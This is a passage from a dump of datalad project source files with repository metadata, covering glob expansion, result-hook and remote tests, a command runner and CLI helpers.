This\n procedure is repeated until a pattern matches or there are no more\n patterns.\n\n Parameters\n ----------\n full : bool, optional\n Return full paths rather than paths relative to `pwd`.\n dot : bool, optional\n Include the \".\" pattern if it was specified.\n refresh : bool, optional\n Run glob regardless of whether there are cached values. This is\n useful if there may have been changes on the file system.\n include_partial : bool, optional\n Whether the results include sub-pattern hits (see description\n above) when the full pattern doesn't match.\n include_misses : : bool, optional\n Whether the results include the original pattern when there are no\n matches for a pattern or its sub-patterns (see description above).\n \"\"\"\n if refresh:\n self._cache = {}\n self._expanded_cache = {}\n\n maybe_dot = self._maybe_dot if dot else []\n if not self._patterns:\n return maybe_dot + []\n\n if \"hits\" not in self._cache:\n hits, partial_hits, misses = self._expand_globs()\n self._cache[\"hits\"] = hits\n self._cache[\"partial_hits\"] = partial_hits\n self._cache[\"misses\"] = misses\n else:\n hits = self._cache[\"hits\"]\n partial_hits = self._cache[\"partial_hits\"]\n misses = self._cache[\"misses\"]\n\n key_suffix = (include_partial, include_misses)\n key_expanded = (\"expanded\",) + key_suffix\n if key_expanded not in self._expanded_cache:\n sources = [hits]\n if include_partial:\n sources.append(partial_hits)\n if include_misses:\n sources.append(misses)\n\n paths = []\n for pattern in self._patterns:\n for source in sources:\n if pattern in source:\n paths.extend(source[pattern])\n break\n self._expanded_cache[key_expanded] = paths\n else:\n paths = self._expanded_cache[key_expanded]\n\n if full:\n key_full = (\"expanded_full\",) + key_suffix\n if key_full not in self._expanded_cache:\n paths = [op.join(self.pwd, p) for p in paths]\n self._expanded_cache[key_full] = paths\n else:\n paths = self._expanded_cache[key_full]\n\n return maybe_dot + paths\n\n def expand_strict(self, full: bool = False, dot: bool = True, refresh: bool = False) -> list[str]:\n return self.expand(full=full, dot=dot, refresh=refresh,\n include_partial=False, include_misses=False)\n\n def _chain(self, what: str) -> list[str]:\n if self._patterns:\n if \"hits\" not in self._cache:\n self.expand()\n # Note: This assumes a preserved insertion order for dicts, which\n # is true with our current minimum python version (3.6) and part of\n # the language spec as of 3.7.\n return list(chain(*self._cache[what].values()))\n return []\n\n @property\n def partial_hits(self) -> list[str]:\n \"\"\"Return patterns that had a partial but not complete match.\n \"\"\"\n return self._chain(\"partial_hits\")\n\n @property\n def misses(self) -> list[str]:\n \"\"\"Return patterns that didn't have any complete or partial matches.\n\n This doesn't include patterns where a sub-pattern matched. 
Those are\n available via `partial_hits`.\n \"\"\"\n return self._chain(\"misses\")\n\n @property\n def paths(self) -> list[str]:\n \"\"\"Return paths relative to `pwd`.\n\n Globs are expanded if `expand` was set to true during instantiation.\n \"\"\"\n if self._expand:\n return self.expand()\n return self._maybe_dot + self._patterns\n" }, { "alpha_fraction": 0.5730367302894592, "alphanum_fraction": 0.5773251056671143, "avg_line_length": 34.875, "blob_id": "5884a0e6e889ed1c488f4e47d047e7f0d7006bd9", "content_id": "fba43f2f1cbb3286c1aacc93182848d55853ea63", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3731, "license_type": "permissive", "max_line_length": 85, "num_lines": 104, "path": "/datalad/core/local/tests/test_resulthooks.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test result hooks\"\"\"\n\nfrom datalad.api import (\n Dataset,\n install,\n)\nfrom datalad.tests.utils_pytest import (\n assert_result_count,\n eq_,\n ok_,\n with_tempfile,\n)\nfrom datalad.utils import on_windows\n\n\n@with_tempfile()\n@with_tempfile()\ndef test_basics(src=None, dst=None):\n # dataset with subdataset, not specific configuration\n ds = Dataset(src).create()\n (ds.pathobj / 'file1').write_text('some')\n ds.save()\n sub = ds.create('subds')\n # second one for a result_xfm test below\n ds.create('subds2')\n\n # now clone the super\n clone = install(source=src, path=dst)\n # config on which kind of results this hook should operate\n clone.config.set(\n 'datalad.result-hook.alwaysbids.match-json',\n # any successfully installed dataset\n '{\"type\":\"dataset\",\"action\":\"install\",\"status\":[\"eq\", \"ok\"]}',\n scope='local',\n )\n # a smoke test to see if a hook definition without any call args works too\n clone.config.set('datalad.result-hook.wtf.call-json',\n 'wtf {{\"result_renderer\": \"disabled\"}}',\n scope='local')\n clone.config.set(\n 'datalad.result-hook.wtf.match-json',\n '{\"type\":\"dataset\",\"action\":\"install\",\"status\":[\"eq\", \"ok\"]}',\n scope='local',\n )\n # configure another one that will unlock any obtained file\n # {dsarg} is substituted by the dataset arg of the command that\n # the eval_func() decorator belongs to\n # but it may not have any, as this is not the outcome of a\n # require_dataset(), but rather the verbatim input\n # it could be more useful to use {refds}\n clone.config.set(\n 'datalad.result-hook.unlockfiles.call-json',\n 'unlock {{\"dataset\":\"{dsarg}\",\"path\":\"{path}\"}}',\n scope='local',\n )\n clone.config.set(\n 'datalad.result-hook.unlockfiles.match-json',\n '{\"type\":\"file\",\"action\":\"get\",\"status\":\"ok\"}',\n scope='local',\n )\n if not on_windows:\n # and one that runs a shell command on any notneeded file-get\n clone.config.set(\n 'datalad.result-hook.annoy.call-json',\n 'run {{\"cmd\":\"touch {path}_annoyed\",'\n '\"dataset\":\"{dsarg}\",\"explicit\":true}}',\n scope='local',\n )\n clone.config.set(\n 'datalad.result-hook.annoy.match-json',\n '{\"type\":[\"in\", [\"file\"]],\"action\":\"get\",\"status\":\"notneeded\"}',\n scope='local',\n )\n # setup done, now see if it works\n clone.get('subds')\n 
clone_sub = Dataset(clone.pathobj / 'subds')\n # now the same thing with a result_xfm, should make no difference\n clone.get('subds2')\n clone_sub2 = Dataset(clone.pathobj / 'subds2')\n\n # hook auto-unlocks the file\n if not clone.repo.is_managed_branch():\n ok_((clone.pathobj / 'file1').is_symlink())\n res = clone.get('file1')\n if not clone.repo.is_managed_branch():\n # we get to see the results from the hook too!\n assert_result_count(\n res, 1, action='unlock', path=str(clone.pathobj / 'file1'))\n ok_(not (clone.pathobj / 'file1').is_symlink())\n\n if not clone.repo.is_managed_branch():\n # different hook places annoying file next to a file that was already present\n annoyed_file = clone.pathobj / 'file1_annoyed'\n ok_(not annoyed_file.exists())\n clone.get('file1')\n ok_(annoyed_file.exists())\n" }, { "alpha_fraction": 0.6358914971351624, "alphanum_fraction": 0.6402192711830139, "avg_line_length": 36.26881790161133, "blob_id": "ad53fe8a62407c48cddc93ce7da8aad9c216f53f", "content_id": "d58e967b974f72d720562a86153925f02c31f16c", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3466, "license_type": "permissive", "max_line_length": 100, "num_lines": 93, "path": "/datalad/tests/test_direct_mode.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test direct mode mechanic\n\n\"\"\"\n\nfrom unittest.mock import patch\n\nfrom datalad.support import path as op\nfrom datalad.support.annexrepo import AnnexRepo\nfrom datalad.support.exceptions import (\n CommandNotAvailableError,\n DirectModeNoLongerSupportedError,\n)\nfrom datalad.tests.utils_pytest import (\n SkipTest,\n assert_in,\n assert_raises,\n with_tempfile,\n)\n\n# if on_windows:\n# raise SkipTest(\"Can't test direct mode switch, \"\n# \"if direct mode is forced by OS anyway.\")\n#\n# repo_version = cfg.get(\"datalad.repo.version\", None)\n# if repo_version and int(repo_version) >= 6:\n# raise SkipTest(\"Can't test direct mode switch, \"\n# \"if repository version 6 or later is enforced.\")\n\n\n# originally lifted from AnnexRepo, kept here to simulate a repo\n# that is still in direct mode\ndef _set_direct_mode(self, enable_direct_mode=True):\n \"\"\"Switch to direct or indirect mode\n\n WARNING! To be used only for internal development purposes.\n We no longer support direct mode and thus setting it in a\n repository would render it unusable for DataLad\n\n Parameters\n ----------\n enable_direct_mode: bool\n True means switch to direct mode,\n False switches to indirect mode\n\n Raises\n ------\n CommandNotAvailableError\n in case you try to switch to indirect mode on a crippled filesystem\n \"\"\"\n if self.is_crippled_fs() and not enable_direct_mode:\n # TODO: ?? 
DIRECT - should we call git annex upgrade?\n raise CommandNotAvailableError(\n cmd=\"git-annex indirect\",\n msg=\"Can't switch to indirect mode on that filesystem.\")\n\n self.call_annex(['direct' if enable_direct_mode else 'indirect']),\n self.config.reload()\n\n # For paranoid we will just re-request\n self._direct_mode = None\n assert(self.is_direct_mode() == enable_direct_mode)\n\n # All further workarounds were stripped - no direct mode is supported\n\n\n@with_tempfile\n@with_tempfile\ndef test_direct_cfg(path1=None, path2=None):\n # and if repo already exists and we have env var - we fail too\n # Adding backend so we get some commit into the repo\n ar = AnnexRepo(path1, create=True, backend='MD5E')\n del ar; AnnexRepo._unique_instances.clear() # fight flyweight\n for path in (path1, path2):\n with patch.dict('os.environ', {'DATALAD_REPO_DIRECT': 'True'}):\n # try to create annex repo in direct mode as see how it fails\n with assert_raises(DirectModeNoLongerSupportedError) as cme:\n AnnexRepo(path, create=True)\n assert_in(\"no longer supported by DataLad\", str(cme.value)) # we have generic part\n assert_in(\"datalad.repo.direct configuration\", str(cme.value)) # situation specific part\n # assert not op.exists(path2) # that we didn't create it - we do!\n # fixing for that would be too cumbersome since we first call GitRepo.__init__\n # with create\n ar = AnnexRepo(path1)\n # check if we somehow didn't reset the flag\n assert not ar.is_direct_mode()\n" }, { "alpha_fraction": 0.5993518829345703, "alphanum_fraction": 0.6020808219909668, "avg_line_length": 36.58333206176758, "blob_id": "adfb93e8f4819f6f315c9302a1eda8b0755ef506", "content_id": "1f274f2c26608444701fec0b997222af9565087f", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5863, "license_type": "permissive", "max_line_length": 88, "num_lines": 156, "path": "/datalad/distributed/tests/test_ora_http.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "import shutil\n\nfrom datalad.api import Dataset\nfrom datalad.customremotes.ria_utils import (\n create_ds_in_store,\n create_store,\n)\nfrom datalad.distributed.ora_remote import LocalIO\nfrom datalad.distributed.tests.ria_utils import (\n common_init_opts,\n populate_dataset,\n)\nfrom datalad.support.exceptions import CommandError\nfrom datalad.tests.utils_pytest import (\n assert_equal,\n assert_in,\n assert_not_in,\n assert_raises,\n assert_repo_status,\n assert_result_count,\n assert_status,\n known_failure_windows,\n serve_path_via_http,\n skip_if_adjusted_branch,\n with_tempfile,\n)\nfrom datalad.utils import Path\n\n# NOTE: All we want and can test here is the HTTP functionality of the ORA\n# remote. As of now, this is get and checkpresent only, sending one\n# request each. The used URI for those requests is based on store layout\n# version 1 and dataset layout version 2. 
Serving archives and/or\n# different layouts via those requests is up to the server side, which we\n# don't test here.\n\n@with_tempfile(mkdir=True)\n@serve_path_via_http\n@with_tempfile\ndef test_initremote(store_path=None, store_url=None, ds_path=None):\n ds = Dataset(ds_path).create()\n store_path = Path(store_path)\n url = \"ria+\" + store_url\n init_opts = common_init_opts + ['url={}'.format(url)]\n\n # fail when there's no RIA store at the destination\n assert_raises(CommandError, ds.repo.init_remote, 'ora-remote',\n options=init_opts)\n # Doesn't actually create a remote if it fails\n assert_not_in('ora-remote',\n [cfg['name']\n for uuid, cfg in ds.repo.get_special_remotes().items()]\n )\n\n # now make it a store\n io = LocalIO()\n create_store(io, store_path, '1')\n create_ds_in_store(io, store_path, ds.id, '2', '1')\n\n # fails on non-RIA URL\n assert_raises(CommandError, ds.repo.init_remote, 'ora-remote',\n options=common_init_opts + ['url={}'\n ''.format(store_path.as_uri())]\n )\n # Doesn't actually create a remote if it fails\n assert_not_in('ora-remote',\n [cfg['name']\n for uuid, cfg in ds.repo.get_special_remotes().items()]\n )\n\n ds.repo.init_remote('ora-remote', options=init_opts)\n assert_in('ora-remote',\n [cfg['name']\n for uuid, cfg in ds.repo.get_special_remotes().items()]\n )\n assert_repo_status(ds.path)\n # git-annex:remote.log should have:\n # - url\n # - common_init_opts\n # - archive_id (which equals ds id)\n remote_log = ds.repo.call_git(['cat-file', 'blob', 'git-annex:remote.log'],\n read_only=True)\n assert_in(\"url={}\".format(url), remote_log)\n [assert_in(c, remote_log) for c in common_init_opts]\n assert_in(\"archive-id={}\".format(ds.id), remote_log)\n\n\n# TODO: on crippled FS copytree to populate store doesn't seem to work.\n# Or may be it's just the serving via HTTP that doesn't work.\n# Either way, after copytree and fsck, whereis doesn't report\n# the store as an available source.\n@skip_if_adjusted_branch\n@known_failure_windows # see gh-4469\n@with_tempfile(mkdir=True)\n@serve_path_via_http\n@with_tempfile\ndef test_read_access(store_path=None, store_url=None, ds_path=None):\n\n ds = Dataset(ds_path).create()\n populate_dataset(ds)\n\n files = [Path('one.txt'), Path('subdir') / 'two']\n store_path = Path(store_path)\n url = \"ria+\" + store_url\n init_opts = common_init_opts + ['url={}'.format(url)]\n\n io = LocalIO()\n create_store(io, store_path, '1')\n create_ds_in_store(io, store_path, ds.id, '2', '1')\n ds.repo.init_remote('ora-remote', options=init_opts)\n fsck_results = ds.repo.fsck(remote='ora-remote', fast=True)\n # Note: Failures in the special remote will show up as a success=False\n # result for fsck -> the call itself would not fail.\n for r in fsck_results:\n if \"note\" in r:\n # we could simply assert \"note\" to not be in r, but we want proper\n # error reporting - content of note, not just its unexpected\n # existence.\n assert_equal(r[\"success\"], \"true\",\n msg=\"git-annex-fsck failed with ORA over HTTP: %s\" % r)\n assert_equal(r[\"error-messages\"], [])\n store_uuid = ds.siblings(name='ora-remote',\n return_type='item-or-list',\n result_renderer='disabled')['annex-uuid']\n here_uuid = ds.siblings(name='here',\n return_type='item-or-list',\n result_renderer='disabled')['annex-uuid']\n\n # nothing in store yet:\n for f in files:\n known_sources = ds.repo.whereis(str(f))\n assert_in(here_uuid, known_sources)\n assert_not_in(store_uuid, known_sources)\n\n annex_obj_target = str(store_path / ds.id[:3] / ds.id[3:]\n / 'annex' / 
'objects')\n shutil.rmtree(annex_obj_target)\n shutil.copytree(src=str(ds.repo.dot_git / 'annex' / 'objects'),\n dst=annex_obj_target)\n\n ds.repo.fsck(remote='ora-remote', fast=True)\n # all in store now:\n for f in files:\n known_sources = ds.repo.whereis(str(f))\n assert_in(here_uuid, known_sources)\n assert_in(store_uuid, known_sources)\n\n ds.drop('.')\n res = ds.get('.')\n assert_equal(len(res), 4)\n assert_result_count(res, 4, status='ok', type='file', action='get',\n message=\"from ora-remote...\")\n\n # try whether the reported access URL is correct\n one_url = ds.repo.whereis('one.txt', output='full'\n )[store_uuid]['urls'].pop()\n assert_status('ok', ds.download_url(urls=[one_url], path=str(ds.pathobj / 'dummy')))\n" }, { "alpha_fraction": 0.4897196292877197, "alphanum_fraction": 0.5018691420555115, "avg_line_length": 21.76595687866211, "blob_id": "59e7acde93552feb3312d1da6072389b4b37e466", "content_id": "6965b406d07d10bdf77cf432ff9da4666ee844c8", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1070, "license_type": "permissive", "max_line_length": 87, "num_lines": 47, "path": "/datalad/typing.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\nimport sys\nfrom typing import TypeVar\n\nif sys.version_info >= (3, 11):\n from typing import Self\nelse:\n from typing_extensions import Self\n\nif sys.version_info >= (3, 10):\n from typing import (\n Concatenate,\n ParamSpec,\n )\nelse:\n from typing_extensions import (\n Concatenate,\n ParamSpec,\n )\n\nif sys.version_info >= (3, 8):\n from typing import (\n Literal,\n Protocol,\n TypedDict,\n )\nelse:\n from typing_extensions import (\n Literal,\n Protocol,\n TypedDict,\n )\n\n__all__ = [\"Literal\", \"ParamSpec\", \"T\", \"K\", \"V\", \"P\"]\n\nT = TypeVar(\"T\")\nK = TypeVar(\"K\")\nV = TypeVar(\"V\")\nP = ParamSpec(\"P\")\n" }, { "alpha_fraction": 0.5891945958137512, "alphanum_fraction": 0.5898949503898621, "avg_line_length": 38.97999954223633, "blob_id": "52a5a8b8fe957f9cdde0ca6310e40488b17c7cb9", "content_id": "32c8074ee32da30eac7327704a82151bf2a2cdaa", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9995, "license_type": "permissive", "max_line_length": 87, "num_lines": 250, "path": "/datalad/runner/runner.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Base DataLad command execution runner\n\"\"\"\nfrom __future__ import annotations\n\nimport logging\nfrom os import PathLike\nfrom queue import Queue\nfrom typing import (\n IO,\n cast,\n)\n\nfrom .protocol import WitlessProtocol\nfrom .coreprotocols import NoCapture\nfrom .exception import 
CommandError\nfrom .nonasyncrunner import (\n ThreadedRunner,\n _ResultGenerator,\n)\nfrom .protocol import GeneratorMixIn\n\n\nlgr = logging.getLogger('datalad.runner.runner')\n\n\nclass WitlessRunner(object):\n \"\"\"Minimal Runner with support for online command output processing\n\n It aims to be as simple as possible, providing only essential\n functionality.\n \"\"\"\n __slots__ = ['cwd', 'env']\n\n def __init__(self,\n cwd: str | PathLike | None = None,\n env: dict | None = None\n ):\n \"\"\"\n Parameters\n ----------\n cwd : str or path-like, optional\n If given, commands are executed with this path as PWD,\n the PWD of the parent process is used otherwise.\n env : dict, optional\n Environment to be used for command execution. If `None` is provided,\n the current process environment is inherited by the sub-process. If\n a mapping is provided, it will constitute the complete environment of\n the sub-process, i.e. no values from the environment of the current\n process will be inherited. If `env` and `cwd` are given, 'PWD' in the\n environment is set to the string-value of `cwd`.\n \"\"\"\n self.env = env\n self.cwd = cwd\n\n def _get_adjusted_env(self,\n env: dict | None = None,\n cwd: str | PathLike | None = None,\n copy: bool = True\n ) -> dict | None:\n \"\"\"Return an adjusted execution environment\n\n This method adjusts the environment provided in `env` to\n reflect the configuration of the runner. It returns\n an altered copy or an altered original, if `copy` is\n `False`.\n\n Parameters\n ----------\n env\n The environment that should be adjusted\n\n cwd: str | PathLike | None (default: None)\n If not None, the content of this variable will be\n put into the environment variable 'PWD'.\n\n copy: bool (default: True)\n if True, the returned environment will be a\n copy of `env`. Else the passed in environment\n is modified. Note: if `env` is not `None` and\n `cwd` is `None` and `copy` is `True`, the\n returned dictionary is still a copy\n \"\"\"\n env = env.copy() if env is not None and copy is True else env\n if cwd is not None and env is not None:\n # If an environment and 'cwd' is provided, ensure the 'PWD' in the\n # environment is set to the value of 'cwd'.\n env['PWD'] = str(cwd)\n return env\n\n def run(self,\n cmd: list | str,\n protocol: type[WitlessProtocol] | None = None,\n stdin: bytes | IO | Queue | None = None,\n cwd: PathLike | str | None = None,\n env: dict | None = None,\n timeout: float | None = None,\n exception_on_error: bool = True,\n **kwargs) -> dict | _ResultGenerator:\n \"\"\"Execute a command and communicate with it.\n\n Parameters\n ----------\n cmd : list or str\n Sequence of program arguments. Passing a single string causes\n execution via the platform shell.\n protocol : WitlessProtocol, optional\n Protocol class handling interaction with the running process\n (e.g. output capture). A number of pre-crafted classes are\n provided (e.g `KillOutput`, `NoCapture`, `GitProgress`).\n If the protocol has the GeneratorMixIn-mixin, the run-method\n will return an iterator and can therefore be used in a for-clause.\n stdin : file-like, bytes, Queue, or None\n If stdin is a file-like, it will be directly used as stdin for the\n subprocess. The caller is responsible for writing to it and closing it.\n If stdin is a bytes, it will be fed to stdin of the subprocess.\n If all data is written, stdin will be closed.\n If stdin is a Queue, all elements (bytes) put into the Queue will\n be passed to stdin until None is read from the queue. 
If None is read,\n            stdin of the subprocess is closed.\n        cwd : str or path-like, optional\n            If given, commands are executed with this path as PWD,\n            the PWD of the parent process is used otherwise. Overrides\n            any `cwd` given to the constructor.\n        env : dict, optional\n            Environment to be used for command execution. If given, it will\n            completely replace any environment provided to the constructor. If\n            `cwd` is given, 'PWD' in the environment is set to its value.\n            This must be a complete environment definition, no values\n            from the current environment will be inherited. Overrides\n            any `env` given to the constructor.\n        timeout: float, optional\n            None or the seconds after which a timeout callback is\n            invoked, if no progress was made in communicating with\n            the sub-process, or if waiting for the subprocess exit\n            took more than the specified time. See the protocol and\n            `ThreadedRunner` descriptions for a more detailed discussion\n            on timeouts.\n        exception_on_error : bool, optional\n            This argument is first interpreted if the protocol is a subclass\n            of `GeneratorMixIn`. If it is `True` (default), a\n            `CommandErrorException` is raised by the generator if the\n            subprocess exited with a return code not equal to zero. If the\n            parameter is `False`, no exception is raised. In both cases the\n            return code can be read from the attribute `return_code` of\n            the generator. Then this argument is interpreted within this function\n            to not raise `CommandError` if value is False in case of non-0 exit.\n        kwargs :\n            Passed to the Protocol class constructor.\n\n        Returns\n        -------\n        dict | _ResultGenerator\n\n            If the protocol is not a subclass of `GeneratorMixIn`, the\n            result of protocol._prepare_result will be returned.\n\n            If the protocol is a subclass of `GeneratorMixIn`, a Generator, i.e.\n            a `_ResultGenerator`, will be returned. This allows using this\n            method in constructs like:\n\n                for protocol_output in runner.run():\n                    ...\n\n            Where the iterator yields whatever protocol.pipe_data_received\n            sends into the generator.\n            If all output was yielded and the process has terminated, the\n            generator will raise StopIteration(return_code), where\n            return_code is the return code of the process. The return code\n            of the process will also be stored in the \"return_code\"-attribute\n            of the runner. 
So you could write:\n\n gen = runner.run()\n for file_descriptor, data in gen:\n ...\n\n # get the return code of the process\n result = gen.return_code\n\n Raises\n ------\n CommandError\n On execution failure (non-zero exit code) this exception is\n raised which provides the command (cmd), stdout, stderr,\n exit code (status), and a message identifying the failed\n command, as properties.\n FileNotFoundError\n When a given executable does not exist.\n \"\"\"\n if protocol is None:\n # by default let all subprocess stream pass through\n protocol = NoCapture\n\n applied_cwd = cwd or self.cwd\n applied_env = self._get_adjusted_env(\n env=env or self.env,\n cwd=applied_cwd,\n )\n\n lgr.debug(\n 'Run %r (protocol_class=%s) (cwd=%s)',\n cmd,\n protocol.__name__,\n applied_cwd\n )\n\n threaded_runner = ThreadedRunner(\n cmd=cmd,\n protocol_class=protocol,\n stdin=stdin,\n protocol_kwargs=kwargs,\n timeout=timeout,\n exception_on_error=exception_on_error,\n cwd=applied_cwd,\n env=applied_env\n )\n\n results_or_iterator = threaded_runner.run()\n if issubclass(protocol, GeneratorMixIn):\n return results_or_iterator\n\n results = cast(dict, results_or_iterator)\n # log before any exception is raised\n lgr.debug(\"Finished %r with status %s\", cmd, results['code'])\n\n # make it such that we always blow if a protocol did not report\n # a return code at all or it was non-0 and we were not asked ignore\n # errors\n return_code = results.get('code', None)\n if return_code is None or (return_code and exception_on_error):\n # the runner has a better idea, doc string warns Protocol\n # implementations not to return these\n results.pop('cmd', None)\n results.pop('cwd', None)\n raise CommandError(\n # whatever the results were, we carry them forward\n cmd=cmd,\n cwd=applied_cwd,\n **results,\n )\n # Denoise result, the return code must be zero at this point.\n results.pop('code', None)\n return results\n" }, { "alpha_fraction": 0.6134969592094421, "alphanum_fraction": 0.6134969592094421, "avg_line_length": 29.5625, "blob_id": "8d69b675c562fb92d1af4016749617d1043bbe12", "content_id": "360dfcfeaa1a6f2c44296cf1a185ce9203c233f8", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 978, "license_type": "permissive", "max_line_length": 74, "num_lines": 32, "path": "/datalad/cli/utils.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "\"\"\"Central place to provide all utilities\"\"\"\n\nimport sys\n\nfrom datalad.log import is_interactive\n\n\n_sys_excepthook = sys.excepthook # Just in case we ever need original one\n\n\ndef setup_exceptionhook(ipython=False):\n \"\"\"Overloads default sys.excepthook with our exceptionhook handler.\n\n If interactive, our exceptionhook handler will invoke\n pdb.post_mortem; if not interactive, then invokes default handler.\n \"\"\"\n\n def _datalad_pdb_excepthook(type, value, tb):\n import traceback\n traceback.print_exception(type, value, tb)\n print()\n if is_interactive():\n import pdb\n pdb.post_mortem(tb)\n\n if ipython:\n from IPython.core import ultratb\n sys.excepthook = ultratb.FormattedTB(mode='Verbose',\n # color_scheme='Linux',\n call_pdb=is_interactive())\n else:\n sys.excepthook = _datalad_pdb_excepthook\n" }, { "alpha_fraction": 0.642636239528656, "alphanum_fraction": 0.642636239528656, "avg_line_length": 38.79999923706055, "blob_id": "dae9fa01bc1953942802fc83543b5f95ef1840a4", "content_id": "c966d3df69d967b0f48598f37253e42cce5a7374", "detected_licenses": [ 
"BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5174, "license_type": "permissive", "max_line_length": 78, "num_lines": 130, "path": "/datalad/cli/exec.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "\"\"\"Call a command interface\n\nProvide a callable to register in a cmdline parser, for executing\na parameterized command call.\n\"\"\"\n\n# ATTN!\n# Top-level inputs should be minimized. This module must be imported\n# for parser construction, but the key function call_from_parser()\n# is only executed when a command is actually engaged -- but not\n# for a help action.\n# Therefore no additional top-level imports beyond those already\n# caused unconditionally by .main, and .parser.\n\nfrom datalad import cfg\n\nfrom datalad.interface.base import (\n is_api_arg,\n)\nfrom datalad.utils import (\n getargspec,\n)\n\n# only imported during command execution\n# .interface._has_eval_results_call\n# from .utils import EnsureKeyChoice\n\n# special-case imports\n# .renderer.DefaultOutputRenderer\n# from datalad.ui import ui\n# from .exceptions import CapturedException\n\n\ndef call_from_parser(cls, args):\n \"\"\"Executable to be registered with the parser for a particular command\n\n Parameters\n ----------\n cls : Interface\n Class implementing a particular interface.\n args : Namespace\n Populated argparse namespace instance.\n\n Returns\n -------\n iterable\n Returns the iterable return by an command's implementation of\n ``__call__()``. It is unwound, in case of a generator being\n returned to actually trigger the underlying processing.\n \"\"\"\n # XXX needs safety check for name collisions\n import inspect\n from datalad.interface.base import _has_eval_results_call\n\n argspec = getargspec(cls.__call__, include_kwonlyargs=True)\n if argspec.keywords is None:\n # no **kwargs in the call receiver, pull argnames from signature\n argnames = argspec.args\n else:\n # common options\n # XXX define or better get from elsewhere\n # ultimately .common_args.common_args could be used, but\n # it is presently unclear what is being excluded here (incomplete set)\n common_opts = ('change_path', 'common_debug', 'common_idebug', 'func',\n 'help', 'log_level', 'logger',\n 'result_renderer', 'subparser')\n argnames = [name for name in dir(args)\n if not (name.startswith('_') or name in common_opts)]\n kwargs = {k: getattr(args, k)\n for k in argnames\n # some arguments might be Python-only and do not appear in the\n # parser Namespace\n if hasattr(args, k) and is_api_arg(k)}\n # we are coming from the entry point, this is the toplevel command,\n # let it run like generator so we can act on partial results quicker\n # TODO remove following condition test when transition is complete and\n # run indented code unconditionally\n if _has_eval_results_call(cls):\n # set all common args explicitly to override class defaults\n # that are tailored towards the the Python API\n kwargs['return_type'] = 'generator'\n kwargs['result_xfm'] = None\n if '{' in args.common_result_renderer:\n from .renderer import DefaultOutputRenderer\n # stupid hack, could and should become more powerful\n kwargs['result_renderer'] = DefaultOutputRenderer(\n args.common_result_renderer)\n else:\n # allow commands to override the default, unless something other\n # than the default 'tailored' is requested\n kwargs['result_renderer'] = \\\n args.common_result_renderer \\\n if args.common_result_renderer != 'tailored' \\\n else getattr(cls, 'result_renderer', 
'generic')\n if args.common_on_failure:\n kwargs['on_failure'] = args.common_on_failure\n # compose filter function from to be invented cmdline options\n res_filter = _get_result_filter(args)\n if res_filter is not None:\n # Don't add result_filter if it's None because then\n # eval_results can't distinguish between --report-{status,type}\n # not specified via the CLI and None passed via the Python API.\n kwargs['result_filter'] = res_filter\n\n ret = cls.__call__(**kwargs)\n if inspect.isgenerator(ret):\n ret = list(ret)\n return ret\n\n\ndef _get_result_filter(args):\n from datalad.support.constraints import EnsureKeyChoice\n\n result_filter = None\n if args.common_report_status or 'datalad.runtime.report-status' in cfg:\n report_status = args.common_report_status or \\\n cfg.obtain('datalad.runtime.report-status')\n if report_status == \"all\":\n pass # no filter\n elif report_status == 'success':\n result_filter = EnsureKeyChoice('status', ('ok', 'notneeded'))\n elif report_status == 'failure':\n result_filter = EnsureKeyChoice('status',\n ('impossible', 'error'))\n else:\n result_filter = EnsureKeyChoice('status', (report_status,))\n if args.common_report_type:\n tfilt = EnsureKeyChoice('type', tuple(args.common_report_type))\n result_filter = result_filter & tfilt if result_filter else tfilt\n return result_filter\n" }, { "alpha_fraction": 0.5024077296257019, "alphanum_fraction": 0.5152487754821777, "avg_line_length": 35.64706039428711, "blob_id": "afddabac39eee808fc5a0a1a175c4d780562733b", "content_id": "2e49b836bc0faa8e10cb9d50343b8ac39af8cb0f", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", 